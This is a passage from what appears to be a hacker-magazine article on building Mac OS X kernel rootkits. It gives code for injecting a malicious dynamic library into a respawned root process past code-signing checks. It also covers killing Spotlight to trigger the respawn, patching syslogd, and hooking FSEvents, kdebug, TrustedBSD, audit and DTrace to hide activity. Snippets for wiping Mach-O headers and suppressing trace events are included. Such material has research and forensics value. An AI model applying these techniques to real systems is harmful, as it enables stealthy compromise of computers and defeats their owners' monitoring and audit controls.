the header to find free space where we can add the new LC_LOAD_DYLIB
command. The necessary free space is common - most binaries have enough
slack space between the last command and first code/data.

The header can be retrieved from the user space with vm_map_read_user()
or copyin (because here we are executing in current proc context).
After we have found the free space and the full Mach-O header is in our
buffer, we just need to add a new LC_LOAD_DYLIB command.

The two below diagrams show what needs to be done at the Mach-O header:

.-------------------.
|       HEADER      |<- Fix this struct:
|-------------------| struct mach_header {
|   Load Commands   |   uint32_t        magic;
|  .-------------.  |   cpu_type_t      cputype;
|  |  Command 1  |  |   cpu_subtype_t   cpusubtype;
|  |-------------|  |   uint32_t        filetype;
|  |  Command 2  |  |   uint32_t        ncmds;      <- add +1
|  |-------------|  |   uint32_t        sizeofcmds; <- += size of new cmd
|  |     ...     |  |   uint32_t        flags;
|  |-------------|  |  };
|  |  Command n  |  |
|  |-------------|  |
|  | Command n+1 |  |<- add new command here:
|  `-------------  | struct dylib_command {
|-------------------|  uint32_t        cmd;
|        Data       |  uint32_t        cmdsize;
| .---------------. |  struct dylib    dylib;
| |   | Section 1 | | };
| | 1 |-----------| | struct dylib {
| |   | Section 2 | |  union lc_str  name;
| `--------------- |  uint32_t timestamp;
| .---------------. |  uint32_t current_version;
| |   | Section 1 | |  uint32_t compatibility_version;
| | 2 |-----------| | };
| |   | Section 2 | | union lc_str {
| `--------------- |  uint32_t        offset;
|       ...         | #ifndef __LP64__ // not used
|                   |  char            *ptr;
|                   | #endif
|                   | };
`-------------------

A diff between original and modified:

.-------------------.     .-------------------.
|       HEADER      |     |       HEADER      |<- Fix this struct
|-------------------|     |-------------------| struct mach_header {
|   Load Commands   |     |   Load Commands   |  ...
|  .-------------.  |     |  .-------------.  | uint32_t  ncmds;     <- fix
|  |  Command 1  |  |     |  |  Command 1  |  | uint32_t  sizeofcmds;<- fix
|  |-------------|  |     |  |-------------|  |  ...
|  |  Command 2  |  |     |  |  Command 2  |  |  };
|  |-------------|  |     |  |-------------|  |
|  |     ...     |  |     |  |     ...     |  |
|  |-------------|  |     |  |-------------|  |
|  |  Command n  |  |     |  |  Command n  |  |
|  `-------------  |     |  |-------------|  |
|                   |---->|  | Command n+1 |  |<- add new command here
|                   |---->|  `-------------  | struct dylib_command {
|-------------------|---->|-------------------|  uint32_t        cmd;
|        Data       |---->|        Data       |  uint32_t        cmdsize;
| .---------------. |---->| .---------------. |  struct dylib    dylib;
| |   | Section 1 | |---->| |   | Section 1 | | };
| | 1 |-----------| |     | | 1 |-----------| |
| |   | Section 2 | |     | |   | Section 2 | |
| `--------------- |     | `--------------- |
| .---------------. |     | .---------------. |
| |   | Section 1 | |     | |   | Section 1 | |
| | 2 |-----------| |     | | 2 |-----------| |
| |   | Section 2 | |     | |   | Section 2 | |
| `--------------- |     | `--------------- |
|       ...         |     |       ...         |
`-------------------     `-------------------

There are other methods to inject the library if there is not enough
space. One that requires only 24 bytes is described at [16].

This approach has one interesting advantage - it is not detectable by code
signing because the injection occurs after its checks and flags are set.
This is the code that sets the flags:

    /*
     * Set code-signing flags if this binary is signed, or if parent has
     * requested them on exec.
     */
    if (load_result.csflags & CS_VALID) {
        imgp->ip_csflags |= load_result.csflags &
            (CS_VALID|
             CS_HARD|CS_KILL|CS_EXEC_SET_HARD|CS_EXEC_SET_KILL);
    } else {
        imgp->ip_csflags &= ~CS_VALID;
    }

    if (p->p_csflags & CS_EXEC_SET_HARD)
        imgp->ip_csflags |= CS_HARD;
    if (p->p_csflags & CS_EXEC_SET_KILL)
        imgp->ip_csflags |= CS_KILL;

The code snippet is from exec_mach_imgact() and located well before our
two candidate functions described in section 4.3. Code signing does not
kill immediately the process. The flags are verified later and a kill
signal sent if code signing was configured to exit on failure (which we
can also modify here).

The only puzzle piece left is which process should we use and how to kill
it. There are many root processes controlled by launchd so it is just
a matter of selecting one with invisible and/or small impact. Spotlight
is for example a good candidate. A code snippet to do the killing:

proc_t victim = proc_find(TARGET_PID);
if (victim != PROC_NULL)
{
    // we need to release reference count from proc_find() before kill
    proc_rele(kill);
    // now we can kill the process or use SIGSEV coz' Spotlight crashes,
    // right? :-)
    psignal(kill, SIGKILL);
}

When launchd respawns the process, we can intercept it at
exec_mach_imgact() and do our magic. The rest is responsibility of the
dynamic library.


----[ 4.5 - The dynamic library

The dynamic library is very easy to create if you use the Xcode template
(oh the drama, hackers use Makefiles!) or just Google for a simple
Makefile.

To execute the library code you can add an entrypoint via a constructor:

extern void init(void) __attribute__ ((constructor));
void init(void)
{
    // do evil stuff here
}

init will be executed as soon as the library is loaded. Another way
could be by modifying the injected process symbol stub and redirect
to an entrypoint function inside the library. While the symbol stub
modification could be made from the kernel, we do not know yet where
library will be loaded so it is harder to execute this. For example, it
could be delayed by hijacking a syscall, wait for its execution and then
modify a symbol. The downside is more time for detection as explained
in next section. Honestly I have not thought much about this case.

To execute commands from the library it is just a matter of fork'ing
and exec'ing whatever command we need. We can also create a new thread
(or multiple) to leave a resident backdoor and so on. Or just execute
the command we need and clean up ourselves to leave no traces.

It is up to you and your particular requirements and imagination :-).


----[ 4.6 - Hiding our tracks

By principle, a rootkit should be as stealth as possible - we need to
cover our tracks to the maximum possible extent. Let me discuss a few
problems and potential solutions with the previously described approaches.

The first one is that we need to restart a target process. This will
leave an immediate clue on a (potentially very) higher PID, depending
when the method is used (near startup it is ok).

Another clue is that we are sending a signal to the target process
and syslogd will capture it. Instead of a kill we could send a SIGSEGV
(Apple's software has bugs, right?), or just temporarily memory patch
syslogd daemon to avoid logging our little trick. Different possibilities
to solve this problem!

The SIGSEGV is particularly interesting since the resulting crash dump
has no useful information and it only leaves this log trail:

12/21/12 3:27:13.093 AM com.apple.launchd[1]: (com.apple.metadata.mds[277])
Job appears to have crashed: Segmentation fault: 11

Patching (temporarily or not) syslogd is rather easy to accomplish. Looking
at Apple's syslogd source we can find the following function in
syslogd/daemon.c:

void process_message(aslmsg msg, uint32_t source)

Near the end it has this code:

/* send message to output modules */
asl_out_message(msg);
if (global.bsd_out_enabled) bsd_out_message(msg);

The asl_out_message() appears to be the interesting place to patch. To
quickly test this theory we can attach gdb to syslogd (warning, ASLR
enabled), and patch that function. We need to search the function address
because there are no debug symbols available.

Let's look at its implementation:

void asl_out_message(aslmsg msg)
{
    dispatch_flush_continuation_cache();
    asl_msg_retain((asl_msg_t *)msg);
    dispatch_async(asl_action_queue, ^{
        _asl_action_message(msg);
        asl_msg_release((asl_msg_t *)msg);
    });
}

There are two external symbols, dispatch_flush_continuation_cache()
and asl_msg_retain(). The former has only a reference and the latter
two. To find the location of asl_out_message() we just need to find out
the proc_t for syslogd process, read and process its symbol table (we
can read from memory or filesystem), correct for ASLR slide, and find
the address of the stub. Since this is not IDA we can't easily find the
cross-references (oh, IDA spoils us).

What we can do is search in the binary the calls to the symbol stub
(it is a relative offset call). Even easier (and probably faster)
is to disassemble and match the address of the call with the stub -
the disassembler will output the final address.

After we have the address where dispatch_flush_continuation_cache() is
called from we just need to find the function prologue and patch it with
a ret (function return is void so no need for xor eax,rax). We can then
restore the original byte after we execute our command. Another function,
bsd_out_message() might need to be patched, but I leave that task to you,
the reader.

Another alternative is to try to recycle the PID that was killed. The
forkproc() function is the one that allocates the new PID for the
child. Might be interesting to research and explore this alternative. You
also might want to reorder the proc list and move the new element to the
original location instead of being in newer location. Many possibilities
to hide and try to detect the rootkit actions. That is why it is fun!

The next issue is that process memory will have our injected library so
we want to remove it as soon as possible. I did some interesting work
in this area but NDA oblige and can't disclose it. It can be done and
you should think about it, or just use a brute approach and kill the
process again and this time do not inject anything. Whatever works :-)

There is no need to have a resident library somewhere at the filesystem
ready to be discovered. We can read and write from and to anywhere the
filesystem so we can store the library code encrypted inside the kernel
module or store it somewhere else, for example in a sqlite3 database
(there are so many spread all over OS X). Before the injection we can
unpack it somewhere, execute it, and then remove when not needed anymore.

One thing I had no time to verify if the impact from Spotlight if we
use the unpacking to filesystem approach. It might be able to detect
the new file and store in its database, so we must be careful over here.


--[ 5 - Revisiting userland<->kernel communication

Fortunately there are many options to establish communication between
kernel and userland applications in OS X. The sysctl interface previously
presented [1] is easy to implement but it is too cumbersome to transfer
large amounts of data. Let me present you additional options.


----[ 5.1 - Character devices and ioctl

The easiest way to have userland<->kernel communication is to create
a character device and use the ioctl interface to control it. We just
need to create and register the new device and add the necessary entry
point functions.

It all starts with the structure cdevsw:
/*
 * Character device switch table
 */
struct cdevsw {
    open_close_fcn_t    *d_open;
    open_close_fcn_t    *d_close;
    read_write_fcn_t    *d_read;
    read_write_fcn_t    *d_write;
    ioctl_fcn_t         *d_ioctl;
    stop_fcn_t          *d_stop;
    reset_fcn_t         *d_reset;
    struct tty          **d_ttys;
    select_fcn_t        *d_select;
    mmap_fcn_t          *d_mmap;
    strategy_fcn_t      *d_strategy;
    void                *d_reserved_1;
    void                *d_reserved_2;
    int                 d_type;
};

The most interesting entrypoints for our purposes are open, close,
ioctl. If you are interested in using this communication channel, you
probably should think about encrypting it or some kind of authentication
method. OS.X/Crisis has no authentication whatsoever so anyone can send
commands to the kernel rootkit after (easily) finding all the possible
ioctl commands.

The code is very simple so there is no point in discussing it here. The
provided source code implements this and kernel control so you can browse
it and verify how it is done.

Besides the problems with encryption, authentication and ioctl commands
reversing, this solution creates a new character device that needs
to be hidden or else it will be too easy to detect. And then we have
additional traces inside the kernel structures that need to be hidden,
creating a vicious circle (rootkits are a vicious circle of hide &
seek and that is why they can be so fun to write about).


----[ 5.2 - Kernel Control KPI

The kernel control KPI is interesting because it allows bidirectional
communication with userland and transfer of large amounts of data. Its
implementation is rather simple via a regular socket (PF_SYSTEM). Apple's
reference documentation can be found at [17] and sample code at [18].

A kernel extension is responsible for creating the socket and the userland
part will read and send data to that same socket (socket access can be
restricted to privileged users or everyone).

The kernel implementation is done by registering a control structure
kern_ctl_reg defined at bsd/sys/kern_control.h. From Apple's example:

// the reverse dns name to be used between kernel and userland
#define BUNDLE_ID   "put.as.hydra"

static struct kern_ctl_reg g_ctl_reg = {
 BUNDLE_ID,      /* use a reverse dns name */
 0,              /* set to 0 for dynamically assigned control ID */
 0,              /* ctl_unit - ignored when CTL_FLAG_REG_ID_UNIT not set */
 /* privileged access required to access this filter */
 CTL_FLAG_PRIVILEGED,
 0,               /* use default send size buffer */
 0,               /* Override receive buffer size */
 ctl_connect,     /* Called when a connection request is accepted */
 ctl_disconnect,  /* called when a connection becomes disconnected */
 NULL,         /* handles data sent from the client to kernel control */
 ctl_set,      /* called when the user process makes the setsockopt call */
 ctl_get       /* called when the user process makes the getsockopt call */
};

The connect and disconnect functions handle userland connections. When a
new connection is established we need to retain the unit id and control
reference - they are required for sending data and removing the kernel
control.

The ctl_get function handles the communication from kernel to userland -
sends data to the socket when client requests it, and ctl_set handles
data from userland to kernel. The kernel data to be sent to userland
should be enqueued using ctl_enqueuedata() (this is where we need the
unit id and control reference).

A quick example of a function to enqueue the PID of a process:

static u_int32_t gClientUnit = 0;
static kern_ctl_ref gClientCtlRef = NULL;
/*
 * get data ready for userland to grab
 * send PID of the suspended process and let the userland daemon do the
 * rest
 */
kern_return_t
queue_userland_data(pid_t pid)
{
    errno_t error = 0;
    if (gClientCtlRef == NULL) return KERN_FAILURE;

    error = ctl_enqueuedata(gClientCtlRef, gClientUnit, &pid,
    sizeof(pid_t), 0);

    if (error) printf("[ERROR] ctl_enqueuedata failed with error: %d\n",
    error);
    return error;
}

Another important detail is about the control ID. Since the recommended
way is to use a dynamically assigned control ID, the userland client
needs somehow to retrieve it. This can be done using a ioctl request
(the reverse dns name must be shared between the kernel and userland).

int gSocket = -1;
struct ctl_info ctl_info;
struct sockaddr_ctl sc;
gSocket = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
// the control ID is dynamically generated so we must obtain sc_id using
// ioctl
memset(&ctl_info, 0, sizeof(ctl_info));
strncpy(ctl_info.ctl_name, "put.as.hydra", MAX_KCTL_NAME);
ctl_info.ctl_name[MAX_KCTL_NAME-1] = '\0';
if (ioctl(gSocket, CTLIOCGINFO, &ctl_info) == -1)
{
    perror("ioctl CTLIOCGINFO");
    exit(1);
}
else
    printf("ctl_id: 0x%x for ctl_name: %s\n", ctl_info.ctl_id,
ctl_info.ctl_name);
// build the sockaddr control structure and finally connect to the socket
bzero(&sc, sizeof(struct sockaddr_ctl));
sc.sc_len = sizeof(struct sockaddr_ctl);
sc.sc_family = AF_SYSTEM;
sc.ss_sysaddr = AF_SYS_CONTROL;
sc.sc_id = ctl_info.ctl_id;
sc.sc_unit = 0;
ret = connect(gSocket, (struct sockaddr*)&sc, sizeof(sc));

After connection to the socket is established, the userland client can
send data using setsockopt() and receive with recv(). The remaining
implementation details are easy to understand by reading Apple's
referenced sample code.

This communication channel might not be that interesting for rootkit'ing
purposes because it requires additional effort to hide, in particular
the socket information that can be explored by memory forensic tools. If
commercial spyware is using character devices for communication then we
can't forget this possibility when analysing a potentially compromised
machine.

Nevertheless it can be interesting for other purposes. As an example,
I created a PoC (to be released later) to stop certain processes when
they are created ( p->p_stat = SSTOP) and communicate their PID to a
userland daemon. The userland daemon attaches to the process and modifies
whatever it needs. In this particular case it is used to patch code
signed applications without needing to resign and patch any checksum
checks. We already saw that OS X code-signining verifications are done
before the process is stopped and do not detect these modifications
(application own run-time code checksum checks are another story!). It
is not the best solution but just a nice set of tricks and demo usage
of this communication channel.


----[ 5.3 - Alternative channels

The two presented solutions are easy to setup and use but also easy
to detect. Their main problem is that they leave "permanent" traces
that need to be hidden (kernel structures for example). This increases
rootkit's complexity and chances of being detected.

Covert channels are a lot more appropriate and a lot has been written
about them. Since it is so easy to use almost any kernel function, the
possibilities to be creative in this department are much higher. Data can
be stealthy read and written anywhere in the filesystem, bypassing many
detection and instrumentation mechanisms as it will be shown next. At
the limit there is no real need for a direct communication channel! For
example, data can be encoded in a binary and intercepted when it is
executed. The possibilities are really endless. This very short section
is just a reminder that rootkit design can be different from what is
usually done and that you should think about it, whether you belong to
the offensive or defensive side.


--[ 6 - Anti-forensics

Mac OS X kernel is instrumentation rich, featuring DTrace and
others. These can assist in rootkit uncloaking. Memory forensics is
also playing an important role these days in malware detection and
analysis. This section goal is to present some ideas on how to attack or
hide from these technologies. It is not an exhaustive list but it tries
to cover the main ones. OS X kernel is still big and full of interesting
places to be explored. Keep that in mind! Due to time constraints it is
not possible to write about fooling/defeating the memory forensics tools
as I initially planned. It was somewhat similar to what was presented at
29C3 in Defeating Windows memory forensics presentation [33] and other
similar work presented in the past.


----[ 6.1 - Cheap tricks to reduce our footprint

An extremely easy trick to pull without any side consequences for us
is to remove the Mach-O header from process's memory. A memory dump
will require additional effort to find and rebuild the original binary
(harder in userland binaries, simpler in kernel extensions). Do not
forget that Mach-O header permissions are R-X so make it writable first.

Kernel extensions must have a start and stop function. Their prototype
specifies a kmod_info_t structure as first parameter. It is part of a
linked list of all loaded kernel extensions (used to hide the rootkit
from kextstat but now marked deprecated) and contains a very useful
field to apply this cheap trick.

typedef struct kmod_info {
    struct kmod_info  * next;
    int32_t             info_version;          // version of this structure
    uint32_t            id;
    char                name[KMOD_MAX_NAME];
    char                version[KMOD_MAX_NAME];
    int32_t             reference_count;       // # linkage refs to this
    kmod_reference_t  * reference_list;        // who this refs (links on)
    vm_address_t        address;               // starting address
    vm_size_t           size;                  // total size
    vm_size_t           hdr_size;              // unwired hdr size
    kmod_start_func_t * start;
    kmod_stop_func_t  * stop;
} kmod_info_t;

The "address" field contains the starting address of the currently loaded
kext, including the ASLR slide (kernel and kernel extensions Mach-O header
values include the current kernel ASLR slide). With this information we
just need to find out the total size of the header and nuke it:

int nuke_mach_header(mach_vm_address_t address)
{
    struct mach_header *mh = (struct mach_header_64*)address;
    uint32_t header_size = 0;
    if (mh->magic == MH_MAGIC_64)
    {
        header_size = mh->sizeofcmds + sizeof(struct mach_header_64);
    }
    else return 1;
    // we have total header size and startup address
    // disable CR0 write protection
    disable_wp();
    memset((void*)my_address, 0, header_size);
    enable_wp();
    return 0;
}

Instead of just zero'ing the header you could fill it with random junk
data for fun. You can even mangle data from the other commands (LINKEDIT,
LC_SYMTAB, LC_DYSYMTAB, LC_UUID). For example, there are no symbol stubs
in kernel - symbols are solved when kernel extension is loaded and calls
are made directly to the referenced symbol. This is a problem because
it can be used to detect valid code and get hints on what it is trying
to do. One can generate a table of all kernel symbols and use it to find
cross references in kernel memory and dump that code.

Function pointers can help to hide our code - the question is how easy or
not it is to bootstrap the rootkit to search the required symbols. One
solution can be to use the techniques described before to find the
symbols and then mangle the bootstrap code - only leave in memory code
using function pointers. Be creative, try to reduce your footprint to
the maximum :-).


----[ 6.2 - Attacking DTrace and other instrumentation features

Mac OS X has many instrumentation features available. There are at
least DTrace, FSEvents, Kauth, kdebug, and TrustedBSD. TrustedBSD's
original goal is not instrumentation related but can be used (or abused)
for this purpose. Kauth is explored in Section 6.3 with AV-Monster II,
while all the others in the next subsections.


------[ 6.2.1 - FSEvents

FSEvents is an API for file system notification. Applications register
for events that are interested in and receive them via /dev/fsevents. A
file system monitor can be built on top of this - the usual suspects
[13] and [14] offer a good explanation about its internals and code
samples. Jonathan Levin has a "filemon" tool available at his book
companion web site.

The responsibility to add the events belongs to the function add_fsevent()
[bsd/vfs/vfs_fsevents.c]. It is a bit long vararg function and I do
not want to spend space and time analysing it. Amit Singh has a nice
figure on page 1421 of [14] with functions that add events. For example,
the open syscall can generate a file create event (FSE_CREATE_FILE).

The next diagram shows the how the event is added:

open() -> open_nocancel() -> open1()    [bsd/vfs/vfs_syscalls.c]
                               |
                               v
[bsd/vfs/vfs_vnops.c]    vn_open_auth() -> vn_open_auth_do_create()
                                                    |
                                                    v
[bsd/vfs/vfs_fsevents.c]       add_fsevent() <- need_fsevent()

In this particular case we could hijack need_fsevent(), match the file we
want to hide and return 0 to avoid event generation. In many cases there
is a direct call to add_fsevent() so we also need to hijack it. Inside our
new function we need to retrieve the necessary information to match the
event we want to hide and return EINVAL or 0 in those cases. You should
study the add_fsevent() function to understand how to implement this. I
do not think there is much value in describing it here - there are more
(interesting) topics to cover.


------[ 6.2.2 - kdebug

kdebug is another (rather obscure) kernel trace facility used only by
Apple utils such as fs_usage and sc_usage. Documentation is poor and the
best references are those utils source code and a few pages by Levin [13].
The relevant include file is bsd/sys/kdebug.h. kdebug is implemented in
kernel functions that might produce relevant events using KERNEL_DEBUG()
macro. The kernel functions involved (in that macro) are kernel_debug()
and kernel_debug_internal() (with always inline attribute).

A 32 bits integer is used for the debug messages, with the following
format:

 ----------------------------------------------------------------------
|              |               |                               |Func   |
| Class (8)    | SubClass (8)  |          Code (14)            |Qual(2)|
 ----------------------------------------------------------------------

For example, filesystem operations use class DBG_FSYSTEM (3) and
different subclasses to filter between different operations such as read
and writes to filesystem, vnode operations, HFS events, etc (consult
kdebug.h include).

Macros exist to encode the integer for each available class. Using BSD
class as an example:

#define KDBG_CODE(Class, SubClass, code) (((Class & 0xff) << 24) |
((SubClass & 0xff) << 16) | ((code & 0x3fff)  << 2))
#define BSDDBG_CODE(SubClass, code) KDBG_CODE(DBG_BSD, SubClass, code)

Grep'ing XNU source code for BSDDBG_CODE will show where kdebug is
implemented in all BSD related functions. The fs_usage util traces
the file system related system calls (its source is located in
system_cmds-550.10 package). For example, it contains the following
code for open() syscall:

#define BSC_open                0x040C0014

If we look at kdebug's include we have the following Class and SubClass
codes:

#define DBG_BSD                 4
#define DBG_BSD_EXCP_SC         0x0C    /* System Calls */

Open is syscall #5 and it matches the code: (0x040C0014 & 0x3FFF) >>
2 = 0x5

Grep'ing for the DBG_BSD_EXCP_SC SubClass will land us into
bsd/dev/i386/systemcalls.c - the file that implements the C portion of
syscalls code. kdebug's tracing of syscalls entry and exit can be found
at unix_syscall64 using two macros that call kernel_debug():

(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
                BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_START,
                (int)(*ip), (int)(*(ip+1)), (int)(*(ip+2)),
                (int)(*(ip+3)), 0);
(...)
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
(...)
KERNEL_DEBUG_CONSTANT_IST(KDEBUG_TRACE,
            BSDDBG_CODE(DBG_BSD_EXCP_SC, code) | DBG_FUNC_END,
            error, uthread->uu_rval[0], uthread->uu_rval[1], p->p_pid, 0);
(...)

The easiest way to disable tracing of BSD related functions (besides
patching kernel_debug to just return) is to modify the calls to
kernel_debug() and reroute them to our own function. The disassembler
makes this extremely easy, so much that I implemented code for each call
to kernel_debug() to have its own trampoline (there is really no need
for such thing!). Sample function to disable all BSD syscall traces:

void
tfc_kernel_debug(uint32_t debugid, uintptr_t arg1, uintptr_t arg2,
uintptr_t arg3, uintptr_t arg4, __unused uintptr_t arg5)
{
 // solve the symbol of the original function
 static void (*_kernel_debug)(uint32_t debugid, uintptr_t arg1,
 uintptr_t arg2, uintptr_t arg3, uintptr_t arg4,
 __unused uintptr_t arg5) = NULL;
 if (_kernel_debug == NULL)
  _kernel_debug = (void*)solve_kernel_symbol(&g_kernel_info,
  "_kernel_debug");

 // do not let fs_usage/sc_usage trace any BSD* system calls
 if ( (debugid >> 24) == DBG_BSD) return;
 else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0);
}

This patch will be suspicious when fs_usage and/or sc_usage are used
because no BSD system calls will be traced and screen output will be very
low. kdebug's implementation poses some problems to distinguish between
cases to hide or not. Its buffers are very small and this is easily
noticed if you peak at fs_usage or sc_usage code (verify the lookup()
[bsd/vfs/vfs_lookup.c] kernel function to see how fs_usage gets the path
name for syscalls such as open()).

Fortunately for us there is a easy way to accomplish this using
current_proc() - it returns a proc structure for the currently executing
process. With this information we can retrieve the process name from
the proc structure (p_comm field, max size 16) and match against the
processes we do not want traced. A code snippet for a simple check to
hide vmware-tools-daemon:

struct proc *p = current_proc();
// MAXCOMLEN == 16, we could hash always to MAXCOMLEN to avoid strlen call
uint32_t hash = hash_name(&p->p_comm[0], strlen(&p->p_comm[0]));
static uint32_t hidehash = 0;
if (hidehash == 0) hidehash = hash_name("vmware-tools-daemon", MAXCOMLEN);
if (hash == hidehash ) return;
else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0);

The basic blocks to override kdebug are presented, implementation details
are left to the attached sample code and to you.

One final word of caution. The interception of Mach syscalls at kdebug
gives some problems and the hooking is very unstable (read kernel
panics). This is particularly exacerbated with the zombies rootkit
feature later described. The attached code has been written to support
that feature but at time of writing I still had no time to research the
Mach problem - the code just ignores that class.


------[ 6.2.3 - TrustedBSD

TrustedBSD is a project that started in FreeBSD and was ported to OS
X in Leopard. It enables a series of (interesting) security features,
the most famous one being the OS X/iOS sandbox. Its implementation is
done by adding "hooks" in critical kernel functions. Policy modules
can be written to receive events from these "hooks" and act on them
if necessary/desirable.

One easy application is to create a runtime file system checker for
critical folders. The app monitors LaunchDaemons and notify the user if
a new file was added in there, which is a not so frequent operation and
a favourite spot for malware to make itself persistent (oh, this was a
good opportunity to use APT buzzword!). It can be used for evil purposes -
the same "hooks" can increase privileges or hide files [25].

Using an example with the open syscall (to be used later with in Kauth
section):

open() -> open_nocancel() -> open1()
                               |
                               v
                         vn_open_auth() -> vn_authorize_open_existing()
                                                    |
                                                    v
                                           mac_vnode_check_open()
                                                    |
                                                    v
                                                MAC_CHECK()
                                                    |
                                                    v
                                           call policy, if registered

The vnode check handler that we can install has the following prototype:

typedef int mpo_vnode_check_open_t(
        kauth_cred_t cred,
        struct vnode *vp,
        struct label *label,
        int acc_mode);

Our handler will receive a pointer to the vnode structure and make
it possible to dump the filename and even transverse the full path
(remember that vnodes exist in a linked list).

MAC_CHECK() is a macro that will route the request to the policy
modules. It is a bit like sysent table where there is a list called
mac_policy_list that holds function pointers. A presentation by Andrew
Case on Mac memory forensics [26] analyses how to find malicious
TrustedBSD modules using this list against a sample I created (rex
the wonder dog). It is worth to check his slides for other Mac memory
forensics tips.

The available policy checks can be found at bsd/security/mac_framework.h,
and their implementation is in the different source files in the same
folder. What interests us is that mac_* functions are always called so
there is a point of entry that can be used. The mac_* functions contain
all the necessary/available information since they are the ones always
calling and passing the parameters to the policy modules via MAC_CHECK()
macro.

To attack this we can use the same old story: hook those functions,
or attack the mac_policy_list using the syscall handler concept, or
something else. When loading the rootkit it might also be useful to
lookup the policy list to verify if there is anything else installed
other than default modules. The system owner might be a bit smarter than
the vast majority ;-).


------[ 6.2.4 - Auditing - Basic Security Module

The auditing features available from the Basic Security Module
Implementation are not really instrumentation but since their purpose is
to track user and process actions we should be interested in understanding
and tweak them to our evil purposes.

Auditing is not fully enabled by default due to its (potentially)
considerable performance hit and disk space usage (oh, I miss those
PCI-DSS meetings). To modify its configuration you need to edit
/etc/security/audit_control. The two interesting fields are flags and
naflags (flags for events that can be matched to a user, naflags for
those who can't). Event classes are defined in /etc/security/audit_class
(description can be found at [27] and [28]). For example, if "pc" class
is configured audit will log exec() and its arguments.

Let's move to what really matters for us, evil stuff! Auditing is
implemented with macros [bsd/security/audit/audit.h] inside BSD and
Mach system calls (and some other places). The following code snippet
is from unix_syscall64 implementation, where entry and exit macros are
placed before the syscall function to be executed is called:

AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);

About the contents of entry macro:

/*
 * audit_syscall_enter() is called on entry to each system call. It is
 * responsible for deciding whether or not to audit the call
 * (preselection), and if so, allocating a per-thread audit record.
 * audit_new() will fill in basic thread/credential properties.
 */

The exit macro is the interesting one because it calls
audit_syscall_exit():

/*
 * audit_syscall_exit() is called from the return of every system call, or
 * in the event of exit1(), during the execution of exit1(). It is
 * responsible for committing the audit record, if any, along with return
 * condition.
 */

When committed, the audit record will be added to an audit queue and
removed from the user thread structure (struct uthread, field uu_ar
[bsd/sys/user.h]).

void
audit_syscall_exit(unsigned int code, int error, __unused proc_t proc,
    struct uthread *uthread) {
(...)
        audit_commit(uthread->uu_ar, error, retval);
out:
        uthread->uu_ar = NULL;
}

The commit function:

void audit_commit(struct kaudit_record *ar, int error, int retval) {
(..)
        TAILQ_INSERT_TAIL(&audit_q, ar, k_q); // add to queue
        audit_q_len++;
        audit_pre_q_len--;
        cv_signal(&audit_worker_cv); // signal worker who commits to disk
        mtx_unlock(&audit_mtx);
}

By default in OS X, almost everything is disabled excepting logging
and authentication to obtain higher privileges. The command "praudit
/dev/auditpipe" (as root, of course) can be used to live audit events. Run
the command and login via ssh, or lock and unlock the console to see
these events.

Syscall exit or audit commit functions can be temporarily patched to
test if they are the right places, and yes they are. Removing the call
to audit_commit() or patching it with a ret removes any trace of audit
events in logs. There are four references to commit in OS X 10.8.2
(3 calls, 1 jump):

- audit_syscall_exit
- audit_mach_syscall_exit
- audit_proc_coredump
- audit_session_event

To have granular control over the auditing process is a bit more
complicated. There is not always enough information available to
distinguish between the cases we want to hide at audit_commit(). For
example, if process auditing is enabled, the fork1() function calls
audit like this: AUDIT_ARG(pid, child_proc->p_pid);

This will call the function responsible to set the audit record field:

void audit_arg_pid(struct kaudit_record *ar, pid_t pid)
{
    ar->k_ar.ar_arg_pid = pid;
    ARG_SET_VALID(ar, ARG_PID);
}

The problem here is that we do not have (yet) enough information about
this fork; we are not sure (yet) if it is the process we want to hide or
some other process. A different tactic must be used! Because there is
an events queue we can hijack the worker responsible for those commits
to disk, audit_worker() [bsd/security/audit/audit_worker.c].

The missing piece is how to correlate all events we are interested
in. Luckily for us (and the auditor in particular) there is a session
id in audit record structure [bsd/security/audit/audit_private.h]:

pid_t  ar_subj_asid; /* Audit session ID */

With this information we just need to hold the queue commit to disk until
enough information to find the correct session ID is available. When we
have it we can edit the queue and remove all the entries that match that
session ID.

Last but not least, there is a critical task left! Auditing logs must be
cleaned in case auditing was already properly configured. The bad news
is that you will have to do this dirty work yourself. Do not forget that
the logs are in binary format and OpenBSM's source at [29] can be helpful
(praudit outputs XML format so it might be a good starting point).


------[ 6.2.5 - DTrace

DTrace is a fantastic dynamic tracing framework introduced by Sun in
Solaris and available in Mac OS X since Leopard. It can be used to trace
in real-time almost every corner of kernel and user processes with minimum
performance impact. An experienced system administrator can use its
power to assist in discovering strange (aka malicious) behaviour. There
are different providers that can trace almost every function entry and
exit, BSD syscalls and Mach traps, specific process, virtual memory, and
so on. The two most powerful providers against rootkits are syscall and
fbt (function boundary). We will see how they are implemented and how to
modify them to hide rootkit activity. A good design and implementation
overview is provided by [23] (Google is your friend) and usage guide at
[24].


------[ 6.2.5.1 - syscall provider

This provider allows to trace every BSD system call entry and return (the
provider for Mach traps is mach_trap). A quick example that prints the path
argument being passed to the open() syscall:
# dtrace -n 'syscall::open:entry
{
    printf("opening %s", copyinstr(arg0));
}'
dtrace: description 'syscall::open:entry' matched 1 probe
CPU     ID                    FUNCTION:NAME
  0    119                       open:entry opening /dev/dtracehelper
  0    119                       open:entry opening
/usr/share/terminfo/78/xterm-256color
  0    119                       open:entry opening /dev/tty
  0    119                       open:entry opening /etc/pf.conf

The syscall provider is useful to detect syscall handler manipulation
but not the function pointers modification at sysent table. To understand
why let's delve into its implementation.

This provider is implemented by rewriting the system call table when
a probe is enabled, which in practice is the same operation as sysent
hooking. The interesting source file is bsd/dev/dtrace/systrace.c. It
contains a global pointer called systrace_sysent - a DTrace related
structure that will hold the original system call pointer and some
other info.

Things start happening at systrace_provide(). Here systrace_sysent is
allocated and all necessary information copied from the original sysent
table (systrace_init). Then internal DTrace probe information is added.

DTrace's philosophy is of zero probe effect when disabled so there are
functions that replace and restore the sysent table entries. There is a
struct called dtrace_pops_t which contains provider's operations. Syscall
provider has the following:

static dtrace_pops_t systrace_pops = {
        systrace_provide,
        NULL,
        systrace_enable,
        systrace_disable,
        NULL,
        NULL,
        NULL,
